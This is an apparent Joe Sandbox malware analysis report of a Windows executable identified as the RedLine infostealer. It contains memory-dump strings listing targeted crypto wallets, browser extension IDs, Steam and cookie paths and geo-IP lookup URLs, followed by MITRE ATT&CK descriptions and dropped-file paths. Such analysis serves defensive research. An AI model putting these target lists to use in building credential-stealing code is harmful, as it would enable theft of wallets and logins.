ffnbelfdoeiohenkjibnmadjiehjhajbProfilesTotal of RAMhttps://api.ip.sb/geoip%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironm, xrefs: 082708F9
YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWa, xrefs: 08270923
fhq, xrefs: 082708D0
RoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program D, xrefs: 08270C65

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: fhq$AtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[Strin$MewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcdd$RoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program D$YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWa$ffnbelfdoeiohenkjibnmadjiehjhajbProfilesTotal of RAMhttps://api.ip.sb/geoip%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironm$fhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext$nanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\Gui$nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabn
API String ID: 0-879495093
Opcode ID: 7663e2173c6b9dfc0fad3608f254be4dca34d714887825e72e39969d220aafbf
Instruction ID: ae92c547f39376ba0bbbe12d951471a741c403429e35fab69777da8472d1afe9
Opcode Fuzzy Hash: 7663e2173c6b9dfc0fad3608f254be4dca34d714887825e72e39969d220aafbf
Instruction Fuzzy Hash: 56B16D32B007059BE719EE74D824AAA7763FF84304F11C53AE8096F391DF7AAC469791

Function 067E0D50 Relevance: 10.3, Strings: 8, Instructions: 297COMMON

Download Yara Rule

Strings

$cq, xrefs: 067E0E4E
$cq, xrefs: 067E0E1C
$cq, xrefs: 067E0F00
$cq, xrefs: 067E0F82
$cq, xrefs: 067E0F76
$cq, xrefs: 067E0DCC
$cq, xrefs: 067E0F50
$cq, xrefs: 067E0E42

Memory Dump Source

Source File: 00000004.00000002.2184715676.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67e0000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: $cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
API String ID: 0-3377385791
Opcode ID: bb29c39b12744d16cd670f77262de3a2a7291725d7fc8e7fdbde625bb3c164f3
Instruction ID: 0203b23452af9d5dd54545e1b1d0afc4ed5aa74e3860ce833c929f5823de492f
Opcode Fuzzy Hash: bb29c39b12744d16cd670f77262de3a2a7291725d7fc8e7fdbde625bb3c164f3
Instruction Fuzzy Hash: 41B1C230B106058FDB55DB69C854ABEBBF7BFC8200B14846AE406D73A2DB74DC69CB91

Function 08272460 Relevance: 7.7, Strings: 6, Instructions: 162COMMON

Download Yara Rule

Strings

$cq, xrefs: 08272522
Software\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Pr, xrefs: 082724AD
configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Pro, xrefs: 082725CB
*.vstring.ReplacedfJaxxpath, xrefs: 08272611
SteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogi, xrefs: 082724EC
*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api., xrefs: 08272572

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: *.vstring.ReplacedfJaxxpath$*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.$Software\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Pr$SteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogi$configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Pro$$cq
API String ID: 0-2238492866
Opcode ID: 389a175460b53af3f45d5fdaa6c277eda2208e42cb614a8d3281b6dcecb7e44d
Instruction ID: 150ac211b3a11467ee6e90430907684f2683318fb47a577f9b15e6ca9a901a61
Opcode Fuzzy Hash: 389a175460b53af3f45d5fdaa6c277eda2208e42cb614a8d3281b6dcecb7e44d
Instruction Fuzzy Hash: CB519C71F1020A8BDB14EF79D86069EB7E2FF84200F658539E409EB394EB759D42CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UzQWEAhf9B.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UzQWEAhf9B.exe.log

C:\Users\user\AppData\Local\Temp\tmp1EA9.tmp

C:\Users\user\AppData\Local\Temp\tmp1ECA.tmp

C:\Users\user\AppData\Local\Temp\tmp1EDA.tmp

C:\Users\user\AppData\Local\Temp\tmp1EFA.tmp

C:\Users\user\AppData\Local\Temp\tmp1EFB.tmp

C:\Users\user\AppData\Local\Temp\tmp57CF.tmp

C:\Users\user\AppData\Local\Temp\tmp57D0.tmp

C:\Users\user\AppData\Local\Temp\tmp57E1.tmp

C:\Users\user\AppData\Local\Temp\tmp57E2.tmp

C:\Users\user\AppData\Local\Temp\tmp57F3.tmp

C:\Users\user\AppData\Local\Temp\tmp57F4.tmp

C:\Users\user\AppData\Local\Temp\tmp5804.tmp

C:\Users\user\AppData\Local\Temp\tmp5815.tmp

Windows Analysis Report
UzQWEAhf9B.exe